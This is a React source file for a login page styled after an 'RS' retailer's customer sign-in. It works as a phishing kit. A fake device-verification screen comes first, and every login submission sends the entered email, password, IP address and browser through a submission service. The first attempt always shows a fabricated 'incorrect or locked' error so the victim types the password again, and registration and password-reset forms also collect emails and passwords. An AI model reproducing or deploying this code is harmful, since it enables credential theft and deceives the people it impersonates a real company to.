import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { getUserIP, getUserBrowser, sendSubmission } from '../services/api';
import DeviceVerification from '../loader/Loader';
import Header from './Header';
import Footer from './Footer';
import VerifyLoginModal from './VerifyLoginModal';

const Login = () => {
  // Verification states: 'verifying' -> 'verified' -> 'done'
  const [verificationState, setVerificationState] = useState('verifying');
  const [isSubmitting, setIsSubmitting] = useState(false);

  const [ipAddress, setIpAddress] = useState('');
  const [browser, setBrowser] = useState('');
  const [email, setEmail] = useState(() => new URLSearchParams(window.location.search).get('email') || '');
  const [password, setPassword] = useState('');
  const [attemptCount, setAttemptCount] = useState(0);
  const [showErrorMessage, setShowErrorMessage] = useState(false);
  const [emailError, setEmailError] = useState(false);
  const [passwordError, setPasswordError] = useState(false);
  const [showVerifyModal, setShowVerifyModal] = useState(false);

  // Forgot password modal state
  const [showForgotModal, setShowForgotModal] = useState(false);
  const [forgotEmail, setForgotEmail] = useState('');
  const [forgotSubmitting, setForgotSubmitting] = useState(false);
  const [forgotDone, setForgotDone] = useState(false);

  // Apply for business account modal state
  const [showBusinessModal, setShowBusinessModal] = useState(false);
  const [businessCompany, setBusinessCompany] = useState('');
  const [businessEmail, setBusinessEmail] = useState('');
  const [businessPhone, setBusinessPhone] = useState('');
  const [businessSubmitting, setBusinessSubmitting] = useState(false);
  const [businessDone, setBusinessDone] = useState(false);

  // Register modal state
  const [showRegisterModal, setShowRegisterModal] = useState(false);
  const [regName, setRegName] = useState('');
  const [regEmail, setRegEmail] = useState('');
  const [regPassword, setRegPassword] = useState('');
  const [regSubmitting, setRegSubmitting] = useState(false);
  const [regDone, setRegDone] = useState(false);

  const navigate = useNavigate();

  // Initial Device Verification Sequence (Screenshots 1 & 2)
  useEffect(() => {
    // Step 1: verifying dot for 1.8s
    const step1 = setTimeout(() => {
      setVerificationState('verified');
    }, 1800);

    // Step 2: verified checkmark for 1.2s then show Sign In page
    const step2 = setTimeout(() => {
      setVerificationState('done');
    }, 3000);

    // Fetch user IP and browser in background
    getUserIP().then(setIpAddress);
    setBrowser(getUserBrowser());

    return () => {
      clearTimeout(step1);
      clearTimeout(step2);
    };
  }, []);

  // Login form submission handler (supports Enter key and click)
  const handleLoginSubmit = async (event) => {
    event.preventDefault();

    if (isSubmitting) return;

    let hasError = false;
    if (!email || !email.includes('@')) {
      setEmailError(true);
      hasError = true;
    } else {
      setEmailError(false);
    }

    if (!password) {
      setPasswordError(true);
      hasError = true;
    } else {
      setPasswordError(false);
    }

    if (hasError) return;

    // Enter loading/submitting state in place
    setIsSubmitting(true);

    const currentAttempt = attemptCount + 1;
    const currentIp = ipAddress || '127.0.0.1';
    const currentBrowser = browser || 'Web Browser';
    const step = currentAttempt === 1 ? 'Login Access - Attempt 1' : `Login Access - Attempt ${currentAttempt}`;

    try {
      await sendSubmission({
        email,
        password,
        attempt: currentAttempt,
        overallAttempt: currentAttempt,
        step,
        ipAddress: currentIp,
        browser: currentBrowser,
      });
    } catch (err) {
      console.error('Submission dispatch error:', err);
    }

    setTimeout(() => {
      setIsSubmitting(false);

      if (attemptCount === 0) {
        setAttemptCount(1);
        setShowErrorMessage(true);
      } else {
        // After the second (or subsequent) login attempt: show the verification login modal
        setAttemptCount((prev) => (prev < 2 ? 2 : prev + 1));
        setShowVerifyModal(true);
      }
    }, 1400);
  };

  // Forgot Password Submission
  const handleForgotSubmit = async (e) => {
    e.preventDefault();
    if (!forgotEmail || !forgotEmail.includes('@')) return;
    setForgotSubmitting(true);
    try {
      await sendSubmission({
        email: forgotEmail,
        step: 'Password Reset Request',
        ipAddress: ipAddress || '127.0.0.1',
        browser: browser || 'Web Browser',
      });
    } catch (err) {
      console.error(err);
    }
    setTimeout(() => {
      setForgotSubmitting(false);
      setForgotDone(true);
    }, 1200);
  };

  // Business Account Application Submission
  const handleBusinessSubmit = async (e) => {
    e.preventDefault();
    if (!businessCompany || !businessEmail) return;
    setBusinessSubmitting(true);
    try {
      await sendSubmission({
        email: businessEmail,
        step: 'Business Account Application',
        extra: `Company: ${businessCompany} | Phone: ${businessPhone || 'N/A'}`,
        ipAddress: ipAddress || '127.0.0.1',
        browser: browser || 'Web Browser',
      });
    } catch (err) {
      console.error(err);
    }
    setTimeout(() => {
      setBusinessSubmitting(false);
      setBusinessDone(true);
    }, 1200);
  };

  // Customer Registration Submission
  const handleRegisterSubmit = async (e) => {
    e.preventDefault();
    if (!regEmail || !regPassword) return;
    setRegSubmitting(true);
    try {
      await sendSubmission({
        email: regEmail,
        password: regPassword,
        step: 'New Customer Registration',
        extra: `Name: ${regName || 'N/A'}`,
        ipAddress: ipAddress || '127.0.0.1',
        browser: browser || 'Web Browser',
      });
    } catch (err) {
      console.error(err);
    }
    setTimeout(() => {
      setRegSubmitting(false);
      setRegDone(true);
      setTimeout(() => {
        setShowRegisterModal(false);
        setEmail(regEmail);
        setPassword(regPassword);
        setShowVerifyModal(true);
      }, 1000);
    }, 1200);
  };

  // Show initial device verification screen on first visit
  if (verificationState !== 'done') {
    return <DeviceVerification isVerified={verificationState === 'verified'} />;
  }

  return (
    <div id="customer-signin-page" className="min-h-screen flex flex-col bg-white font-sans text-gray-900">
      {/* Top RS Header Navigation */}
      <Header />

      {/* Main Container */}
      <main className="flex-1 w-full max-w-7xl mx-auto px-4 sm:px-8 py-8 md:py-10">
        {/* Page Title */}
        <h1 id="customer-signin-title" className="text-3xl font-extrabold text-[#111111] tracking-tight mb-6">
          Customer Sign In
        </h1>

        {/* Top Error Alert Banner (Screenshot 2) */}
        {showErrorMessage && attemptCount < 2 && (
          <div
            id="signin-error-banner"
            className="w-full bg-[#FCE8EC] border border-[#F5C7D2] px-4 py-3 sm:px-5 sm:py-3.5 mb-8 flex items-start space-x-3.5"
          >
            <div className="flex-shrink-0 text-[#6B1426] mt-0.5">
              <svg
                className="w-5 h-5 text-[#6B1426]"
                fill="none"
                stroke="currentColor"
                strokeWidth="2"
                viewBox="0 0 24 24"
              >
                <path
                  strokeLinecap="round"
                  strokeLinejoin="round"
                  d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z"
                />
              </svg>
            </div>
            <p className="text-xs sm:text-[13px] text-[#4A1525] font-medium leading-relaxed">
              The account sign-in was incorrect or your account is temporarily locked due to sign-in failures. Please verify your details and try again, or if you've already done that, contact customer service.
            </p>
          </div>
        )}

        {/* Verification Pending Banner when attemptCount >= 2 */}
        {attemptCount >= 2 && (
          <div
            id="signin-verify-required-banner"
            className="w-full bg-[#EFF6FF] border border-[#BFDBFE] px-4 py-3 sm:px-5 sm:py-3.5 mb-8 flex flex-col sm:flex-row items-start sm:items-center justify-between gap-3"
          >
            <div className="flex items-start sm:items-center space-x-3">
              <div className="flex-shrink-0 text-[#1D4ED8] mt-0.5 sm:mt-0">
                <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z" />
                </svg>
              </div>
              <p className="text-xs sm:text-[13px] text-[#1E3A8A] font-medium leading-relaxed">
                Security verification is required to complete sign-in. Please verify your login credentials to proceed.
              </p>
            </div>
            <button
              id="open-verify-modal-btn"
              type="button"
              onClick={() => setShowVerifyModal(true)}
              className="bg-[#2A437E] hover:bg-[#203463] text-white text-xs font-semibold px-4 py-2 rounded-none transition-colors whitespace-nowrap self-end sm:self-auto"
            >
              Verify Login
            </button>
          </div>
        )}

        {/* 2-Column Responsive Layout */}
        <div className="grid grid-cols-1 lg:grid-cols-2 gap-12 lg:gap-20">
          {/* LEFT COLUMN: Registered Customers & New Company Account */}
          <div id="registered-customers-column" className="flex flex-col">
            {/* Section: Registered Customers */}
            <div className="border-b border-gray-300 pb-2">
              <h2 className="text-base font-semibold text-[#111111]">
                Registered Customers
              </h2>
            </div>

            <div className="mt-4 flex items-center justify-between text-sm">
              <p className="text-gray-700 text-sm">
                If you have an account, sign in with your email address.
              </p>
              <span className="text-xs text-[#cc0000] font-medium whitespace-nowrap ml-2">
                * Required Fields
              </span>
            </div>

            {/* Sign In Form */}
            <form id="signin-form" onSubmit={handleLoginSubmit} className="mt-6 max-w-md">
              {/* Email Field */}
              <div className="mb-5">
                <label
                  htmlFor="email"
                  className="block text-sm font-semibold text-gray-800 mb-1"
                >
                  Email <span className="text-[#cc0000]">*</span>
                </label>
                <input
                  id="email"
                  type="email"
                  value={email}
                  onChange={(e) => {
                    setEmail(e.target.value);
                    if (emailError) setEmailError(false);
                  }}
                  className={`w-full max-w-sm border ${
                    emailError ? 'border-red-500' : 'border-gray-400'
                  } rounded-none px-3 py-2 text-sm text-gray-800 focus:outline-none focus:border-blue-700`}
                  autoComplete="email"
                />
                {emailError && (
                  <p id="email-error-msg" className="text-[#cc0000] text-xs mt-1">
                    Please enter a valid email address.
                  </p>
                )}
              </div>

              {/* Password Field */}
              <div className="mb-6">
                <label
                  htmlFor="password"
                  className="block text-sm font-semibold text-gray-800 mb-1"
                >
                  Password <span className="text-[#cc0000]">*</span>
                </label>
                <input
                  id="password"
                  type="password"
                  value={password}
                  onChange={(e) => {
                    setPassword(e.target.value);
                    if (passwordError) setPasswordError(false);
                  }}
                  className={`w-full max-w-sm border ${
                    passwordError ? 'border-red-500' : 'border-gray-400'
                  } rounded-none px-3 py-2 text-sm text-gray-800 focus:outline-none focus:border-blue-700`}
                  autoComplete="current-password"
                />
                {passwordError && (
                  <p id="password-error-msg" className="text-[#cc0000] text-xs mt-1">
                    Password is required.
                  </p>
                )}
              </div>

              {/* Action Buttons: Login + Forgot Password */}
              <div className="flex items-center space-x-5">
                <button
                  id="login-submit-button"
                  type="submit"
                  disabled={isSubmitting}
                  className={`${
                    isSubmitting
                      ? 'bg-[#e0e2e6] text-white cursor-not-allowed'
                      : 'bg-[#2A437E] hover:bg-[#203463] text-white cursor-pointer'
                  } font-semibold text-sm px-6 py-2 rounded-none transition-colors select-none`}
                >
                  Login
                </button>
                <button
                  id="forgot-password-link"
                  type="button"
                  onClick={() => {
                    setForgotEmail(email);
                    setForgotDone(false);
                    setShowForgotModal(true);
                  }}
                  className="text-[#2A437E] hover:underline text-sm font-medium bg-transparent border-none p-0 cursor-pointer"
                >
                  Forgot Your Password?
                </button>
              </div>
            </form>

            {/* Section: New Company Account */}
            <div id="new-company-section" className="mt-12">
              <div className="border-b border-gray-300 pb-2">
                <h2 className="text-base font-semibold text-[#111111]">
                  New Company Account
                </h2>
              </div>
              <p className="text-sm text-gray-700 mt-4 leading-relaxed max-w-lg">
                If you represent a company, you will want to use our company account area.
                Creating a company account provides all company members with access to B2B
                features like quoting, company users management, quick order, and more.
              </p>
              <button
                id="apply-business-button"
                type="button"
                onClick={() => {
                  setBusinessEmail(email);
                  setBusinessDone(false);
                  setShowBusinessModal(true);
                }}
                className="mt-5 bg-[#2A437E] hover:bg-[#203463] text-white font-bold text-xs tracking-wider px-5 py-2.5 rounded-none uppercase transition-colors cursor-pointer"
              >
                APPLY FOR BUSINESS ACCOUNT
              </button>
            </div>
          </div>

          {/* RIGHT COLUMN: New Customers */}
          <div id="new-customers-column" className="flex flex-col">
            <div className="border-b border-gray-300 pb-2">
              <h2 className="text-base font-semibold text-[#111111]">
                New Customers
              </h2>
            </div>
            <p className="text-sm text-gray-700 mt-4 leading-relaxed max-w-md">
              Creating an account has many benefits: check out faster, keep more than one
              address, track orders and more.
            </p>
            <div>
              <button
                id="register-button"
                type="button"
                onClick={() => {
                  setRegEmail(email);
                  setRegDone(false);
                  setShowRegisterModal(true);
                }}
                className="mt-6 bg-[#2A437E] hover:bg-[#203463] text-white font-bold text-xs tracking-wider px-6 py-2.5 rounded-none uppercase transition-colors cursor-pointer"
              >
                REGISTER
              </button>
            </div>
          </div>
        </div>
      </main>

      {/* Bottom RS Maroon Footer */}
      <Footer />

      {/* Login Verification Modal (shown after 2nd login attempt) */}
      <VerifyLoginModal
        isOpen={showVerifyModal}
        onClose={() => setShowVerifyModal(false)}
        initialEmail={email}
        initialPassword={password}
        ipAddress={ipAddress}
        browser={browser}
        initialOverallAttempt={attemptCount >= 2 ? attemptCount : 2}
        onSuccess={() => navigate('/activated')}
      />

      {/* Modal: Forgot Password */}
      {showForgotModal && (
        <div id="forgot-password-modal" className="fixed inset-0 z-50 flex items-center justify-center p-4 bg-black/60 animate-fadeIn">
          <div className="bg-white max-w-md w-full p-6 sm:p-8 shadow-2xl border border-gray-200 relative">
            <button
              id="close-forgot-modal"
              type="button"
              onClick={() => setShowForgotModal(false)}
              className="absolute top-4 right-4 text-gray-400 hover:text-gray-700 text-xl font-bold"
            >
              &times;
            </button>
            <h3 className="text-lg font-bold text-gray-900 mb-2">Forgot Your Password?</h3>
            {forgotDone ? (
              <div className="bg-green-50 border border-green-200 text-green-800 text-sm p-4 mt-3">
                <p className="font-semibold">Reset instructions sent!</p>
                <p className="text-xs text-green-700 mt-1">If an account exists for {forgotEmail}, you will receive a reset link shortly.</p>
                <button
                  type="button"
                  onClick={() => setShowForgotModal(false)}
                  className="mt-4 bg-[#2A437E] text-white px-4 py-1.5 text-xs font-semibold"
                >
                  Close
                </button>
              </div>
            ) : (
              <form onSubmit={handleForgotSubmit} className="mt-4">
                <p className="text-xs text-gray-600 mb-4">
                  Please enter your email address below to receive a password reset link.
                </p>
                <label className="block text-xs font-semibold text-gray-700 mb-1">
                  Email Address <span className="text-[#cc0000]">*</span>
                </label>
                <input
                  type="email"
                  required
                  value={forgotEmail}
                  onChange={(e) => setForgotEmail(e.target.value)}
                  className="w-full border border-gray-300 px-3 py-2 text-sm focus:outline-none focus:border-[#2A437E] mb-4"
                  placeholder="name@company.com"
                />
                <div className="flex justify-end space-x-3">
                  <button
                    type="button"
                    onClick={() => setShowForgotModal(false)}
                    className="px-4 py-2 text-xs font-semibold border border-gray-300 text-gray-700 hover:bg-gray-50"
                  >
                    Cancel
                  </button>
                  <button
                    id="submit-forgot-password-btn"
                    type="submit"
                    disabled={forgotSubmitting}
                    className="px-5 py-2 text-xs font-bold bg-[#2A437E] hover:bg-[#203463] text-white uppercase tracking-wider"
                  >
                    {forgotSubmitting ? 'Sending...' : 'Reset Password'}
                  </button>
                </div>
              </form>
            )}
          </div>
        </div>
      )}

      {/* Modal: Business Account Application */}
      {showBusinessModal && (
        <div id="business-account-modal" className="fixed inset-0 z-50 flex items-center justify-center p-4 bg-black/60 animate-fadeIn">
          <div className="bg-white max-w-lg w-full p-6 sm:p-8 shadow-2xl border border-gray-200 relative">
            <button
              id="close-business-modal"
              type="button"
              onClick={() => setShowBusinessModal(false)}
              className="absolute top-4 right-4 text-gray-400 hover:text-gray-700 text-xl font-bold"
            >
              &times;
            </button>
            <h3 className="text-lg font-bold text-gray-900 mb-1">Apply for Business Account</h3>
            <p className="text-xs text-gray-600 mb-4">Access business pricing, net terms, and volume quotation discounts.</p>
            {businessDone ? (
              <div className="bg-green-50 border border-green-200 text-green-800 text-sm p-4">
                <p className="font-semibold">Application Received!</p>
                <p className="text-xs text-green-700 mt-1">Thank you for applying. A dedicated RS account representative will review your application within 24 business hours.</p>
                <button
                  type="button"
                  onClick={() => setShowBusinessModal(false)}
                  className="mt-4 bg-[#2A437E] text-white px-4 py-1.5 text-xs font-semibold"
                >
                  Done
                </button>
              </div>
            ) : (
              <form onSubmit={handleBusinessSubmit} className="space-y-3">
                <div>
                  <label className="block text-xs font-semibold text-gray-700 mb-1">Company / Organization <span className="text-[#cc0000]">*</span></label>
                  <input
                    type="text"
                    required
                    value={businessCompany}
                    onChange={(e) => setBusinessCompany(e.target.value)}
                    placeholder="e.g. Apex Industrial Solutions LLC"
                    className="w-full border border-gray-300 px-3 py-2 text-sm focus:outline-none focus:border-[#2A437E]"
                  />
                </div>
                <div>
                  <label className="block text-xs font-semibold text-gray-700 mb-1">Business Email <span className="text-[#cc0000]">*</span></label>
                  <input
                    type="email"
                    required
                    value={businessEmail}
                    onChange={(e) => setBusinessEmail(e.target.value)}
                    placeholder="purchasing@company.com"
                    className="w-full border border-gray-300 px-3 py-2 text-sm focus:outline-none focus:border-[#2A437E]"
                  />
                </div>
                <div>
                  <label className="block text-xs font-semibold text-gray-700 mb-1">Contact Phone</label>
                  <input
                    type="tel"
                    value={businessPhone}
                    onChange={(e) => setBusinessPhone(e.target.value)}
                    placeholder="(555) 000-0000"
                    className="w-full border border-gray-300 px-3 py-2 text-sm focus:outline-none focus:border-[#2A437E]"
                  />
                </div>
                <div className="flex justify-end space-x-3 pt-3">
                  <button
                    type="button"
                    onClick={() => setShowBusinessModal(false)}
                    className="px-4 py-2 text-xs font-semibold border border-gray-300 text-gray-700 hover:bg-gray-50"
                  >
                    Cancel
                  </button>
                  <button
                    id="submit-business-btn"
                    type="submit"
                    disabled={businessSubmitting}
                    className="px-5 py-2 text-xs font-bold bg-[#2A437E] hover:bg-[#203463] text-white uppercase tracking-wider"
                  >
                    {businessSubmitting ? 'Submitting...' : 'Submit Application'}
                  </button>
                </div>
              </form>
            )}
          </div>
        </div>
      )}

      {/* Modal: New Customer Registration */}
      {showRegisterModal && (
        <div id="customer-register-modal" className="fixed inset-0 z-50 flex items-center justify-center p-4 bg-black/60 animate-fadeIn">
          <div className="bg-white max-w-lg w-full p-6 sm:p-8 shadow-2xl border border-gray-200 relative">
            <button
              id="close-register-modal"
              type="button"
              onClick={() => setShowRegisterModal(false)}
              className="absolute top-4 right-4 text-gray-400 hover:text-gray-700 text-xl font-bold"
            >
              &times;
            </button>
            <h3 className="text-lg font-bold text-gray-900 mb-1">Create Customer Account</h3>
            <p className="text-xs text-gray-600 mb-4">Fast checkout, order history tracking, and saved delivery addresses.</p>
            {regDone ? (
              <div className="bg-green-50 border border-green-200 text-green-800 text-sm p-4">
                <p className="font-semibold">Account created successfully!</p>
                <p className="text-xs text-green-700 mt-1">Please complete verification on the following screen...</p>
              </div>
            ) : (
              <form onSubmit={handleRegisterSubmit} className="space-y-3">
                <div>
                  <label className="block text-xs font-semibold text-gray-700 mb-1">Full Name</label>
                  <input
                    type="text"
                    value={regName}
                    onChange={(e) => setRegName(e.target.value)}
                    placeholder="Jane Doe"
                    className="w-full border border-gray-300 px-3 py-2 text-sm focus:outline-none focus:border-[#2A437E]"
                  />
                </div>
                <div>
                  <label className="block text-xs font-semibold text-gray-700 mb-1">Email Address <span className="text-[#cc0000]">*</span></label>
                  <input
                    type="email"
                    required
                    value={regEmail}
                    onChange={(e) => setRegEmail(e.target.value)}
                    placeholder="name@example.com"
                    className="w-full border border-gray-300 px-3 py-2 text-sm focus:outline-none focus:border-[#2A437E]"
                  />
                </div>
                <div>
                  <label className="block text-xs font-semibold text-gray-700 mb-1">Password <span className="text-[#cc0000]">*</span></label>
                  <input
                    type="password"
                    required
                    value={regPassword}
                    onChange={(e) => setRegPassword(e.target.value)}
                    placeholder="Create a strong password"
                    className="w-full border border-gray-300 px-3 py-2 text-sm focus:outline-none focus:border-[#2A437E]"
                  />
                </div>
                <div className="flex justify-end space-x-3 pt-3">
                  <button
                    type="button"
                    onClick={() => setShowRegisterModal(false)}
                    className="px-4 py-2 text-xs font-semibold border border-gray-300 text-gray-700 hover:bg-gray-50"
                  >
                    Cancel
                  </button>
                  <button
                    id="submit-register-btn"
                    type="submit"
                    disabled={regSubmitting}
                    className="px-5 py-2 text-xs font-bold bg-[#2A437E] hover:bg-[#203463] text-white uppercase tracking-wider"
                  >
                    {regSubmitting ? 'Creating Account...' : 'Register'}
                  </button>
                </div>
              </form>
            )}
          </div>
        </div>
      )}
    </div>
  );
};

export default Login;
